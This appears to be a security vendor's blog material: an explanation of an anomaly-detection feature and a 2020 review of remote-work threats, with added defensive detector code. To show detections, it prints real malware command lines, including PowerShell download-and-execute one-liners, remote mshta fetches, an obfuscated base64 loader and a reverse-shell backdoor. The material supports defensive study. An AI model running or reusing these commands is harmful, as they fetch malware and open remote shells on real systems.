To eliminate these threats, IT security teams need technology that allows them to detect any suspicious application activity from a corporate cybersecurity perspective. Spotting anomalies in trusted software helps to identify threats at the very early stages, when the malware is already on the device but before the antivirus reacts to it. This technology, developed by Kaspersky, is called Adaptive Anomaly Control.

To make ​​anomaly detection work, several problems need to be solved. First, how does Adaptive Anomaly Control know which activity is abnormal and which is not? Secondly, if the control notifies an administrator about each deviation, many of the notifications will most likely turn out to be just false positives for scripts launched as part of a workflow. In that situation, the user will immediately want to disable the control.

To resolve that, the technology should first be “trained” to recognize how applications work and what actions are performed regularly by employees as part of their job responsibilities. This minimizes the number of false positives and keeps administrators from going crazy. And, most importantly, when Adaptive Anomaly Control notifies the IT security manager about suspicious activity, it should make sure they understand when action needs to be taken immediately. Thus, the technology will turn from “the boy who kept crying wolf” into an advanced version of Little Red Riding Hood, who manages to recognize the wolf in the guise of her grandmother early on and call the lumberjacks for help before she gets eaten.

How Adaptive Anomaly Control works

Adaptive Anomaly Control works on the basis of rules, statistics and exceptions. Rules cover three groups of programs: office programs, Windows Management Instrumentation, and script engines and frameworks, as well as the abnormal program activity category. The rules are already developed in the product, so there is no need to write them manually.

List of rules for office applications

To start with, Adaptive Anomaly Control has training mode activated for about two weeks. During this time, it monitors the network and collects statistics on application usage. Technically, Adaptive Anomaly Control mostly analyzes process creation actions. For example, the command line code of a new process, file path and name of executable, and also the calling stack can be analyzed to determine an anomaly. The technology marks regular anomalies, which indicate that processes are started by employees for work purposes. Based on the data received, it then sets exceptions to the rules. If administrators use scripts that could potentially trigger the rules, they can create exceptions before turning on the component, which will improve the quality of the training process.

The training period avoids false positives, but it also helps to catch important anomalies. If a false positive occurs within a rule, administrators can choose not to apply the exception across the entire network, but instead configure it for just the particular script that triggered the rule. This mitigates the risk of throwing a global exception that makes the component useless.

The policies can be tuned for different groups of users individually and inherited as part of user profiles. For example, financial department employees would never legitimately need to execute JavaScript, but the development team will. Therefore, for the software development department, some rules may be disabled or provided with numerous exceptions, while for the financial department, they may be turned on. Adaptive Anomaly Control identifies the user group in which the rule is triggered to block or allow execution accordingly.

Adding an exclusion for a user or group

After the training period, when Adaptive Anomaly Control enters combat mode, the component notifies the IT security manager about any anomalies outside of the exceptions specified during the training period. It provides information for investigation, such as what processes triggered the operations, on what computers and under what users.


Example of anomalous activity by Microsoft Word and possible actions

For example, a PowerShell script trying to start a Windows Command Processor, HTML Application Host, or Register Server from office software may be considered suspicious. Launching these activities is technically possible but not typical of regular operation. Let us focus on some real-life examples which the Adaptive Anomaly Control component detects. Fin7 spear phishing campaigns have included malicious Word documents with DDE execution of PowerShell code, which were detected and blocked (doc MD5: 2C0CFDC5B5653CB3E8B0F8EEEF55FC32).

Fin7 document with DDE execution

Command-line code from inside a document:

powershell -C ;echo "https://sec[.]gov/";IEX((new-object net.webclient).downloadstring('https[:]//trt.doe.louisiana[.]gov/fonts.txt'))

Another example is the LockiBot’s downloader, which was also started from within office software (doc MD5: 2151D178B6C849E4DDB08E5016A38A9A):

mshta http[:]//%20%20@j[.]mp/asdaaskdasdjijasdiodkaos

Adaptive Anomaly Control also detects suspicious drop attempts by office applications. For example, a Qbot document-dropped payload was detected: C:\Arunes\caemyuta\Polaser.exe (doc MD5: 3823617AB2599270A5D10B1331D775FE). Another example of a detected dropper is this Cymulate Framework document activity: %tmp%\c0de203103ce5f0a5463e324c1863eb1_CymulateNativeReverseShell.exe (exe MD5: D8DBF8C20E8EA57796008D0F59104042).

Similarly, with Windows Management Instrumentation, Adaptive Anomaly Control may react if HTML Application Host or a PowerShell script is launched from WMI. In addition, according to Kaspersky research, most malicious activity (62%) is detected in the WMI group. WMI is a common tool among malware developers because of its convenience. It makes it easy to launch PowerShell code and to perform a wide range of actions, such as collecting system intelligence.


The number of unique users attacked, by detection group (download)

For example, the Silent Break Security framework was detected during lateral movement using WMI, which ran this inline PowerShell code:

powershell -NoP -NonI -W Hidden -C "$pnm='57wXU7nxLgCRzFJ1q';$enk='cX6MKM670IO+B5YCcnL8RWbc27WOIIdNxhq45TAcCdI=';sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('vTxt...<SKIPPED LONG BASE64 STRING>...yULif/Pj/'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()"

Such cryptominers as WannaMine and KingMiner also use WMI for spreading across networks. Below, you can see their command-line code that triggered detection:

powershell.exe -NoP -NonI -W Hidden "if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64')){IEX(New-Object Net.WebClient).DownloadString('http[:]//safe.dashabi[.]nl:80/networks.ps1')}else{IEX(New-Object Net.WebClient).DownloadString('http[:]//safe.dashabi[.]nl:80/netstat.ps1')}"

mshta.exe vbscript:GetObject("script:http[:]//165233.1eaba4fdae[.]com/r1.txt")(window.close)

In the group of script engines and frameworks, activities such as running dynamic or obfuscated code may be suspicious. For example, LemonDuck’s fileless downloader was detected during lateral movement:

IEX(New-Object Net.WebClient).DownloadString('http[:]//t.amynx[.]com/gim.jsp')

Originally, it was a base64-encoded inline PowerShell script. The decoded version is shown here for convenience.

Another example in the group of script engines is Clipbanker’s scheduled task command line, also originally a base64-encoded inline PowerShell script:

iex $(Get-ItemProperty -Path HKCU:\Software -Name kumi -ErrorAction Stop).kumi

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell code for offensive security, penetration testing and red teaming. An example of a detected fileless PowerShell backdoor:

$sm=(New-Object Net.Sockets.TCPClient(`XX.XX.XX.XX`,9999)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

As part of the abnormal program activity category, files with anomalous names or locations are tracked: for example, a third-party program which has the name of a system file but is not stored in the system folder. Also, suspicious files inside system directories are tracked: for example, a ShadowPad backdoor was started inside a system folder: C:\windows\debug\srv.exe (DLL hijacking used; DLL MD5: CC2F7D7CA76A5223E936570A076B39B8). Adaptive Anomaly Control detects such activity. Another detected example is a Swisyn backdoor at: C:\windows\system\explorer.exe (MD5: 8E0B4BC934519400B872F9BAD8D2E9C6). The botnet Mirai also places its parts in a system folder and gets detected: C:\windows\system\backs.bat (MD5: 7F70B9755911B0CDCFC1EBC56B310B65).

A detailed log of Adaptive Anomaly Control rules applied to various user groups

“Process action blocked” notification

The diagram of the Adaptive Anomaly Control algorithm shows how decisions are made during the training period. If a rule was not triggered at all during training, the technology will consider the actions associated with this rule as suspicious and block them. If a rule is triggered, an administrator receives a report and decides what the technology should do: block the process or allow it and notify the user. Another option is to extend the training to monitor further the way the rule is working. If the user does not take any action, the control will also continue to work in smart training mode. The training mode time limit is then reset.

Adaptive Anomaly Control training algorithm
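As an added illustration of the workflow described in this section (not Kaspersky's code), the following Python models rules over process-creation events for the groups listed above, a training period, and the per-group and per-script exceptions an administrator sets after reviewing the training report; the executable names, expected directories and sample events are constructed assumptions.

```python
# Added illustration of the Adaptive Anomaly Control workflow described above: rules over
# process-creation events, a training period, then per-group and per-script exceptions.
# Not Kaspersky's code; rule sets, field names and sample events are constructed here.
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
WMI_HOSTS = {"wmiprvse.exe"}  # WMI provider host, assumed parent of WMI-launched processes
SCRIPT_ENGINES = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command Processor, HTML Application Host, Register Server, PowerShell: not typical office children
OFFICE_CHILD_LOLBINS = {"cmd.exe", "mshta.exe", "regsvr32.exe", "powershell.exe"}
# System binaries and the (lower-case) directory each is expected to live in
EXPECTED_SYSTEM_DIR = {"svchost.exe": r"c:\windows\system32", "explorer.exe": r"c:\windows"}
# Markers of dynamic or remotely fetched code in a script engine command line
DYNAMIC_CODE = re.compile(r"\b(iex|invoke-expression|downloadstring|frombase64string|encodedcommand)\b", re.I)


@dataclass(frozen=True)
class ProcEvent:
    user_group: str  # policy group of the logged-on user, e.g. "finance"
    parent: str      # image name of the parent process
    image: str       # full path of the newly created process
    cmdline: str

    @property
    def name(self):
        return self.image.rsplit("\\", 1)[-1].lower()

    @property
    def directory(self):
        return self.image.rsplit("\\", 1)[0].lower()


def office_spawns_lolbin(ev):
    return ev.parent.lower() in OFFICE_APPS and ev.name in OFFICE_CHILD_LOLBINS

def wmi_spawns_script_host(ev):
    return ev.parent.lower() in WMI_HOSTS and ev.name in {"powershell.exe", "mshta.exe"}

def script_engine_runs_dynamic_code(ev):
    return ev.name in SCRIPT_ENGINES and DYNAMIC_CODE.search(ev.cmdline) is not None

def system_name_outside_system_dir(ev):
    expected = EXPECTED_SYSTEM_DIR.get(ev.name)
    return expected is not None and ev.directory != expected

RULES = {f.__name__: f for f in (office_spawns_lolbin, wmi_spawns_script_host,
                                 script_engine_runs_dynamic_code, system_name_outside_system_dir)}


class AdaptiveAnomalyControl:
    def __init__(self):
        self.training = True
        self.seen = {}        # (group, rule) -> command lines that fired it during training
        self.exceptions = {}  # (group, rule) -> None (rule off for group) or set of command lines

    def add_exception(self, group, rule, cmdline=None):
        key = (group, rule)
        if cmdline is None:
            self.exceptions[key] = None  # disable the rule for the whole group
        elif self.exceptions.get(key, set()) is not None:
            self.exceptions.setdefault(key, set()).add(cmdline)  # except only this script

    def _allowed(self, group, rule, cmdline):
        allowed = self.exceptions.get((group, rule), set())  # no exception: nothing allowed
        return allowed is None or cmdline in allowed

    def finish_training(self):
        """Enter combat mode; return the training-period hits the administrator must decide on."""
        self.training = False
        return {k: sorted(v) for k, v in self.seen.items()}

    def process(self, ev):
        hits = [name for name, rule in RULES.items() if rule(ev)]
        if self.training:
            for h in hits:
                self.seen.setdefault((ev.user_group, h), set()).add(ev.cmdline)
            return ("training", hits)
        blocked = [h for h in hits if not self._allowed(ev.user_group, h, ev.cmdline)]
        return ("block", blocked) if blocked else ("allow", hits)


def demo():
    aac = AdaptiveAnomalyControl()
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    build = "powershell -C IEX (Get-Content .\\build-helpers.ps1 -Raw)"  # constructed dev script
    aac.process(ProcEvent("developers", "explorer.exe", ps, build))  # seen during training
    # The administrator reviews the report and excepts just that script, not the whole rule.
    for (group, rule), cmdlines in aac.finish_training().items():
        for c in cmdlines:
            aac.add_exception(group, rule, c)
    events = {  # constructed combat-mode events
        "finance_word_to_cmd": ProcEvent("finance", "WINWORD.EXE", r"C:\Windows\System32\cmd.exe", "cmd /c whoami"),
        "dev_build_script": ProcEvent("developers", "explorer.exe", ps, build),
        "dev_other_script": ProcEvent("developers", "explorer.exe", ps,
                                      "powershell -C IEX (Get-Content .\\other.ps1 -Raw)"),
        "fake_explorer": ProcEvent("finance", "services.exe", r"C:\windows\system\explorer.exe", "explorer.exe"),
        "wmi_mshta": ProcEvent("finance", "WmiPrvSE.exe", r"C:\Windows\System32\mshta.exe",
                               'mshta.exe vbscript:GetObject("script:http://example.invalid/r1.txt")'),
    }
    return {label: aac.process(ev) for label, ev in events.items()}
```

Calling demo() blocks the finance user's Word-to-cmd launch, the developers' unreviewed script, the misplaced explorer.exe and the WMI-launched mshta, while the build script excepted during training is allowed.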

If this technology is so effective, then what are all the other protection features needed for?

Adaptive Anomaly Control solves the specific task of early threat detection. It does so automatically and requires no special administration skills or proactive measures. Note that the technology does not detect the malware itself, but rather its delivery to the network, as well as the potentially dangerous actions launched by an insider, or the malicious activity of programs that have a status of “not a virus”. It is always easier to treat the disease at an early stage, so early detection of threats helps to get rid of them faster, with less workload on the IT and information security departments.

However, it is equally important to use the entire range of protective measures including signature-based malware detection, behavioral analysis, vulnerability detection and patch management, and exploit prevention. These technologies help to block most generic attacks, which means that advanced protection mechanisms such as Adaptive Anomaly Control are freed up to detect the really complex evasive threats. Adaptive Anomaly Control is used for covering this specific risky area and it is effective in this role, while other endpoint technologies have to address their respective areas of expertise. This way, the complete cybersecurity solution will be efficient enough to protect the business from cyberthreats.

December 10, 2020

The story of the year: remote work

The coronavirus pandemic has caused sudden, sweeping change around the world. The necessary social distancing measures are having an impact on all of us. One large part of society that has been affected by these measures more than others is the employed. While direct customer facing businesses like restaurants and retailers have had to change their opening hours, adapt their business models or close their doors entirely, there are still millions of jobs that can be done at home, outside of the usual office working environment.

Organizations need to adapt to meet employee needs and ensure they stay productive, motivated and secure. With so many of us being asked to work in new ways in order to stay connected to our colleagues and customers, it is important to remember both the professional and personal challenges working from home on a permanent basis can bring. Quite obviously, this situation has brought a lot of issues into our lives. A survey conducted in April 2020, as things were changing rapidly, revealed that around half (46%) of respondents had never worked from home before and therefore, were not entirely ready for such changes.

There is a lot to be said about social and productivity issues caused by the new rhythm of work, but in fact, things were not that bad, because remote work in some cases helped people to have a better work-life balance and even be more productive.

What changed: guilty pleasures and life-work disbalance

Remote work is not an entirely new phenomenon; its benefits have been discussed for years now. In some industries, like IT, remote work was already quite widespread. Last year, Kaspersky analyzed some of the positives of remote work. That research highlighted its most significant benefits, including increased employee productivity, improved work-life balance and reduced absenteeism. The events of this year made it possible to test those assumptions.

At the same time, the massive move towards remote work was not particularly voluntary – employees who were forced to work from home did not always welcome this opportunity as they had to contend with new challenges. However, they have also uncovered some substantial benefits:

  • Comfort level: Employees became both more comfortable and uncomfortable. A study by Kaspersky in April found that nearly a third of employees (32%) working from home were struggling with back pain after being forced to use kitchen stools or a sofa to work. However, by November, employees had begun to compensate for this discomfort with certain “guilty pleasures”, such as “working in comfy clothes all day” (with 48% wanting to have this option in the future) and even “working without clothes”.

What lockdown/pandemic guilty pleasures would you like to keep?

  • Family issues: Being at home all day has, not surprisingly, had an effect on people’s relationships with their loved ones, with 21% of respondents from the same study in April admitting to experiencing family issues due to remote work. Two drivers of this conflict are not having a separate room for every family member who needs to work from home (26%) and arguments about how much children should use the Internet (33%). But remote work is not all bad for families, as a recent study found that 47% were now able to spend more time with their families, highlighting it as the key benefit of the whole work-from-home situation.

What positive things have come out of the pandemic that you would like to keep?

  • Work-life balance: Staying at home has led to difficulties maintaining an appropriate work-life balance, with nearly a third of respondents (31%) from the same survey in April admitting that they were now working more, although 46% admitted they were now spending more time pursuing personal activities. However, by November, employee attitudes appear to have shifted in favor of remote work, with nearly three-quarters (74%) saying they were happy to never return to at least some of the traditional workplace dynamics.

When thinking about the traditional, ‘old ways of working’ what do you not want to go back to?

  • Productivity levels: As previously mentioned, studies have indicated that working remotely can actually lead to an increase in productivity. Kaspersky found that a full 40% of employees noticed no change in their productivity levels, with 29% admitting to being more productive. However, it is also important to note employees are still missing some aspects of the traditional workplace environment, chiefly seeing their colleagues face-to-face (34%).

Over the past few months, what, if anything have you missed about work?

Security issues: old, new and refreshed

As shown above, questions regarding remote work – good or bad, better or worse for employees, helpful or not for businesses – are not as obvious as they might seem at first glance. However, in this report, we will focus mainly on what remote work means for businesses and employees from a security perspective. One of the most critical questions of work-from-home security is related to employees’ awareness of the main concepts of cybersecurity. As shown by the survey, by April, 73% of workers had not received any IT security awareness training from their employer since they transitioned to working from home, leading employees to feel unprepared for facing cybersecurity issues that may arise when working remotely.

Moreover, our research showed that remote staff tended to overestimate their knowledge of cybersecurity basics. In early April 2020, Kaspersky and Area9 Lyceum released an adaptive learning course for those transitioning to at-home working, covering the basics of secure remote operations. Analysis of anonymized learning results revealed that in 90% of the cases where learners selected an incorrect answer, they rated their confidence in that answer as “I know this” or “I think I know this”.

The most dangerous outcome of such a situation is “unconscious incompetence”: the user does not even consider the risks of an action, because it is habitual and feels appropriate.

Shadow IT

Meanwhile, the adoption of video conferencing, file storage services, file sharing services and personal messaging apps is on the rise as we rely on the Internet to share information and keep in touch for work purposes. Not all employees stick to their business accounts for work-related purposes.

Most common shadow IT in use

For example, 42% of workers say they are using personal email accounts for work and nearly half (49%) have admitted to increasing how often they do this. Additionally, 38% use personal messengers for work purposes, and 60% say they now do this more often because of working from home. File-sharing services that have not been approved by IT departments are also being used a lot, with 53% of respondents saying they are using these more often for work-related purposes. Using such services has great benefits for keeping staff connected but can come at a cost if one or more of them become a target for cybercriminals, as it can lead to both theft of corporate information and unauthorized access to internal resources of the company.

According to our telemetry, cybercriminals actively disguised their malware as the popular messengers and online conferencing applications that remote workers adopted to replace in-person communication. Kaspersky detected 1.66 million unique malicious files spread under the guise of such applications.


Applications used as lures, January – November 2020

Once installed, these files mostly loaded adware, programs that flood the victim’s device with unwanted advertising and harvest personal data for third parties. In particular cases, however, the same distribution technique was used to deliver malicious implants for targeted espionage.

RDP attacks

Naturally, working from home requires employees to log in to corporate resources remotely, often from their personal devices. One of the most common tools used for this purpose is RDP, Microsoft’s proprietary protocol for remote access to Windows workstations and servers. Unfortunately, given that many offices transitioned to remote work with little notice, many RDP servers were not properly configured, something cybercriminals have sought to take advantage of to gain unauthorized access to confidential corporate resources.

The most common type of attack is brute force: criminals try username and password combinations for the RDP connection until one works. This succeeds because many of the hastily exposed servers accept connections from anywhere on the Internet and rely on weak or reused passwords, often without account lockout or multi-factor authentication. Once a valid pair is found, the attackers have remote access to the target computer on the network.

Starting in the beginning of March, the number of Bruteforce.Generic.RDP attacks skyrocketed, resulting in the total number of the attacks within the first eleven months of 2020 reaching 3.3 billion. Within the same eleven-month period in 2019, Kaspersky detected 969 million such attacks worldwide.


RDP attacks dynamics, January – November 2019 and 2020
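On the target host, the brute-force attempts described above leave a very recognisable trail: each failed guess is a Windows Security event 4625 (failed logon) with Logon Type 10 (RemoteInteractive) or, when Network Level Authentication fronts RDP, Logon Type 3 (Network) from the same source address, and a successful guess is a 4624 from that address shortly after. The detector below is an added example, not code from the article or from Kaspersky: it groups failures per source address in a sliding window, distinguishes one account under attack from a spray across many accounts, and flags a success that follows a burst. The log records are constructed inline in a simplified CSV shape; a real pipeline would pull the same fields from the event log or a SIEM, and the threshold and window are assumptions to tune.

```python
"""Minimal RDP brute-force detector over Windows Security logon events (added example)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Tuple

FAIL_THRESHOLD = 10              # failures from one source address ...
WINDOW = timedelta(minutes=5)    # ... within this sliding window (both values are assumptions)
RDP_LOGON_TYPES = {"10", "3"}    # RemoteInteractive, or Network when NLA fronts the RDP listener

# NT status codes carried in the 4625 "Sub Status" field.
SUB_STATUS = {
    "0xC0000064": "unknown user name",
    "0xC000006A": "wrong password",
    "0xC0000234": "account locked out",
}


def parse_line(line: str) -> Dict[str, object]:
    """Parse one constructed record: time,event_id,logon_type,account,source_ip,sub_status."""
    t, event_id, logon_type, account, source_ip, sub_status = line.strip().split(",")
    return {"time": datetime.fromisoformat(t), "event_id": event_id, "logon_type": logon_type,
            "account": account, "source_ip": source_ip, "sub_status": sub_status}


def detect_rdp_bruteforce(lines: List[str]) -> List[Dict[str, object]]:
    """Return alerts for sources exceeding FAIL_THRESHOLD failures in WINDOW, plus any later success."""
    events = sorted((parse_line(l) for l in lines if l.strip()), key=lambda e: e["time"])
    recent: Dict[str, Deque[Tuple[datetime, str, str]]] = defaultdict(deque)
    flagged = set()      # sources already alerted on; kept for the whole run, not just the window
    alerts: List[Dict[str, object]] = []
    for e in events:
        if e["logon_type"] not in RDP_LOGON_TYPES:
            continue     # console, service or batch logons are not RDP
        ip = e["source_ip"]
        window = recent[ip]
        while window and e["time"] - window[0][0] > WINDOW:
            window.popleft()                      # drop failures older than the window
        if e["event_id"] == "4625":
            window.append((e["time"], e["account"], e["sub_status"]))
            if len(window) >= FAIL_THRESHOLD and ip not in flagged:
                flagged.add(ip)
                accounts = {a for _, a, _ in window}
                alerts.append({
                    # many accounts from one source is a spray; one account is a classic brute force
                    "kind": "password spray" if len(accounts) > 1 else "brute force",
                    "source_ip": ip, "accounts": sorted(accounts), "failures": len(window),
                    "reasons": sorted({SUB_STATUS.get(s, s) for _, _, s in window}),
                    "time": e["time"],
                })
        elif e["event_id"] == "4624" and ip in flagged:
            # a successful logon from a source that was just guessing: likely compromise
            alerts.append({"kind": "success after burst", "source_ip": ip,
                           "account": e["account"], "time": e["time"]})
    return alerts


def constructed_sample() -> List[str]:
    """Constructed records: a burst against 'administrator' that ends in a success, plus benign noise."""
    base = datetime(2020, 3, 12, 8, 0, 0)
    lines = []
    for i in range(12):   # twelve wrong-password failures from one address within four minutes
        t = base + timedelta(seconds=20 * i)
        lines.append(f"{t.isoformat()},4625,10,administrator,203.0.113.45,0xC000006A")
    # then a success from the same address: one of the guesses landed
    lines.append(f"{(base + timedelta(minutes=4, seconds=30)).isoformat()},4624,10,administrator,203.0.113.45,0x0")
    # an employee mistyping a password twice from the VPN range: below threshold, no alert
    lines.append(f"{(base + timedelta(minutes=1)).isoformat()},4625,10,j.smith,10.8.0.23,0xC000006A")
    lines.append(f"{(base + timedelta(minutes=1, seconds=15)).isoformat()},4625,10,j.smith,10.8.0.23,0xC000006A")
    # a local console failure (Logon Type 2) is not RDP and is ignored
    lines.append(f"{(base + timedelta(minutes=2)).isoformat()},4625,2,j.smith,-,0xC000006A")
    return lines


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(constructed_sample()):
        print(alert)
```

Run as-is, the sample yields two alerts: a brute force against a single account from 203.0.113.45 after the tenth failure, and the success from that address a minute later, which is the event worth an immediate response. Legitimate mistypes stay below the threshold. The `flagged` set is deliberately never cleared, so a success hours after the burst still fires; in production you would expire it with the same window or correlate on the resulting session instead.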

Bring Your Own Device

A Kaspersky survey has found that a little more than two-thirds of respondents are using a personal computer to work from home, and nearly half have done so in the past. This kind of policy, Bring Your Own Device, has long been disputed in the cybersecurity world, as it tends to make corporate resources more vulnerable to attack. Even among those who have devices provided by their employers (55%), most do not separate their work and personal activities. In fact, a full 51% admit to watching adult content on the device they use for work, a category of content frequently used as a lure by cybercriminals.

Activities workers are spending more of their time doing

Part of the problem with BYOD policies is that businesses that adopt them often do not accompany them with appropriate cybersecurity measures. The same survey that found that two-thirds of employees used their personal devices also found that half of companies with BYOD policies did not have policies in place to regulate their use – and only a third (32%) provided antivirus software for personal devices.

A virtual private network (VPN) allows for much more secure connections, but only 53% of workers are using one to access their corporate networks. This is particularly problematic if employees log in to corporate resources from unsecured public networks, say, in a coffee shop or restaurant. It is worth noting that, especially in smaller businesses, employees often store documents containing personally identifiable information on these devices. Should this information fall into the wrong hands, it would not only be problematic for the company, but would also put the privacy of the individuals concerned at risk.

In 2019, before remote work swept the world, Kaspersky found that over half (52%) of enterprises said that their breaches occurred as a result of employees’ inappropriate IT use. Working from home and using personal devices only compounds these risks, particularly when employees are not taught the appropriate cybersecurity policies or given the right tools.

Scam and phishing

One of the most common concerns for workers is related to phishing scams. For instance, more than a quarter (27%) of survey respondents say they have received malicious emails related to COVID-19 while working from home, a trend Kaspersky’s experts have been tracking closely during the pandemic. Scammers prey on worried workers who want to know more about the coronavirus pandemic.

According to Kaspersky telemetry, the volume of scams related to social benefit payments increased fivefold in 2020 compared with the same period in 2019. Fraudulent emails of this kind offer various kinds of financial assistance, surcharges, allowances and other payments.

In another scenario, victims receive an email, purportedly from their HR department, carrying important COVID-19 information issued by a government institution (the CDC) as an attachment. The attachment is an IMG disk image: Windows mounts such files as a virtual drive, so the image is simply a carrier for the malicious content inside, and one that many email filters did not inspect.
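The IMG carrier works because a gateway that decides on the file name, or on the declared MIME type, never sees the payload inside the image, and renaming the file or wrapping it in a ZIP defeats an extension blocklist entirely. The check below is an added example, not code from the article or from Kaspersky: it recognises a mountable disk image from its bytes (the ISO 9660 and UDF volume descriptor identifiers at byte 0x8000, or a FAT boot sector), descends one level into ZIP attachments, and reports an image hiding behind a harmless extension. The sample attachments, including the fake ISO, are constructed inline; the extension blocklist is a hypothetical policy, not a recommendation from the page.

```python
"""Recognise disk-image e-mail attachments by content rather than by file name (added example)."""
import io
import os
import zipfile
from typing import List, Optional, Tuple

# Extensions a mail gateway might already reject (hypothetical policy list).
IMAGE_EXTENSIONS = {".img", ".iso", ".udf", ".vhd", ".vhdx"}


def sniff_disk_image(data: bytes) -> Optional[str]:
    """Return 'iso9660', 'udf' or 'fat' if the bytes look like a mountable image, else None."""
    # ISO 9660 / UDF keep their volume descriptors at byte 0x8000 (2048-byte sector 16):
    # byte 0 is the descriptor type, bytes 1..5 the standard identifier.
    if len(data) > 0x8006:
        ident = bytes(data[0x8001:0x8006])
        if ident == b"CD001":
            return "iso9660"
        if ident in (b"BEA01", b"NSR02", b"NSR03", b"TEA01"):
            return "udf"
    # FAT12/16/32: the boot sector ends in 0x55AA and the BIOS Parameter Block carries a
    # "FATxx" type string at offset 54 (FAT12/16) or 82 (FAT32).
    if len(data) >= 512 and data[510:512] == b"\x55\xaa":
        if data[54:57] == b"FAT" or data[82:85] == b"FAT":
            return "fat"
    return None


def inspect_attachment(name: str, data: bytes, depth: int = 0) -> List[Tuple[str, str]]:
    """Return (path, reason) findings for one attachment, descending one level into ZIP files."""
    findings: List[Tuple[str, str]] = []
    ext = os.path.splitext(name.lower())[1]
    image_type = sniff_disk_image(data)
    if image_type and ext not in IMAGE_EXTENSIONS:
        # the interesting case: a disk image renamed to look like a document
        findings.append((name, "disk image (%s) disguised with extension %r" % (image_type, ext)))
    elif image_type or ext in IMAGE_EXTENSIONS:
        findings.append((name, "disk image attachment (%s)" % (image_type or "by extension")))
    if depth < 1 and zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for member in zf.infolist():
                if not member.is_dir():
                    findings.extend(inspect_attachment(name + "/" + member.filename,
                                                       zf.read(member), depth + 1))
    return findings


def build_fake_iso(volume_id: bytes = b"CDC_COVID19_GUIDANCE") -> bytes:
    """Constructed stand-in for an ISO 9660 image: a primary volume descriptor at sector 16."""
    img = bytearray(0x8000 + 2048)
    img[0x8000] = 1                                   # type 1 = primary volume descriptor
    img[0x8001:0x8006] = b"CD001"                     # standard identifier
    img[0x8006] = 1                                   # descriptor version
    img[0x8028:0x8028 + len(volume_id)] = volume_id   # volume identifier field (offset 40)
    return bytes(img)


def build_zip(entries: List[Tuple[str, bytes]]) -> bytes:
    """Constructed ZIP container holding the given (member name, payload) pairs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for member_name, payload in entries:
            zf.writestr(member_name, payload)
    return buf.getvalue()


def run_demo() -> List[Tuple[str, str]]:
    """Inspect four constructed attachments modelled on the lures described above."""
    attachments = [
        ("COVID-19_HR_Update.img", build_fake_iso()),                              # plain image
        ("CDC_Guidance.pdf", build_fake_iso()),                                    # renamed image
        ("covid_update.zip", build_zip([("guidance.img", build_fake_iso())])),     # image in a ZIP
        ("newsletter.pdf", b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\n%%EOF\n"),  # benign
    ]
    findings: List[Tuple[str, str]] = []
    for name, data in attachments:
        findings.extend(inspect_attachment(name, data))
    return findings


if __name__ == "__main__":
    for path, reason in run_demo():
        print(path, "->", reason)
```

The three malicious samples produce a finding each, including the one renamed to `.pdf` and the one nested in the ZIP, while the genuine PDF passes. Only one level of nesting is inspected here; a gateway should recurse with a depth and size budget so that archive bombs do not turn the check into a denial of service.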

Another popular topic to exploit in times like these is money. Many people have lost their jobs or are close to unemployment. Exploiting the need for money, the attackers offer reimbursement plans to individual employees. Such offers characteristically contain a URL the recipient is asked to follow or an attachment that needs to be opened.

And of course, the attackers could not keep from exploiting the name of the WHO itself.

Using the WHO logo seems to be so effective that sometimes, it occupies half of the email content, again spreading hope and false promises of a vaccine.

One fraudulent mailshot disguised as a WHO newsletter offered tips about staying safe from COVID-19.

To get the information, the recipient had to click a link pointing to a fake WHO website. The design was so close to the original that only the URL gave away the scam. The cybercriminals were after login credentials for accounts on the official WHO site. Whereas in the mailshots above, only a username and password were asked for, in later ones, a phone number was also requested.

In addition, we detected several emails supposedly from the WHO, containing documents with malware. The recipient was asked to open the attachment in DOC or PDF format, which allegedly offered coronavirus prevention advice. For example, this message contained a copy of Backdoor.Win32.Androm.tvmf:

There were other, less elaborate mailshots with harmful attachments, including ones containing Trojan-Spy.Win32.Noon.gen:

APT groups

The COVID-19 topic was also abused in the world of APTs, where multiple threat actors used it to create lures. This applies, for example, to such threat actors as IronHusky and TransparentTribe.

IronHusky / ViciousPanda

Documents used by this APT group normally contain Visual Basic macros or older exploits for Microsoft Office and, on successful infection, present decoy content such as that shown here: a document in Mongolian that looks like genuine correspondence between the Mongolian Ministry of External Affairs and China. It mentions concerns about the spreading epidemic in China and growing case numbers in Asian countries.

TransparentTribe / MythicLeopard / APT36

This is another example of abusing the COVID-19 topic, this time by the APT group known as TransparentTribe, which has reportedly been active in South Asian countries such as India and Pakistan. Here the lure is an Excel spreadsheet, which does not really change the attack medium compared with the previous case.

Ginp and tracking applications

Even those cybercriminals who were acting only in the financial field adapted to the circumstances. A good example is Ginp, a banking trojan for Android used in a campaign exploiting the COVID-19 topic. After Ginp received a special command, it opened a web page titled “Coronavirus Finder”. The page had a simple interface that showed the number of nearby people infected with the coronavirus and urged the user to pay a small amount for seeing their exact locations.

The web page offered the visitor to input bank card details to make the transaction. Once the details were entered, they went directly to the criminals, and nothing else would happen. The attackers did not even charge the victim the small amount. And of course, they did not show any information about the people infected with coronavirus, because they did not have any.

Home entertainment

Not all the threats are related to the work process directly. Employees are spending more time at home, playing games, ordering food and watching movies. Cybercriminals are aware of that and are doing their best to exploit this situation.

Gaming threats

According to our telemetry, in April 2020 the daily number of attempts to visit malicious websites exploiting the gaming topic was 54% higher than in January. Interestingly, Minecraft was the most abused game, followed by Counter-Strike: Global Offensive and The Witcher 3.

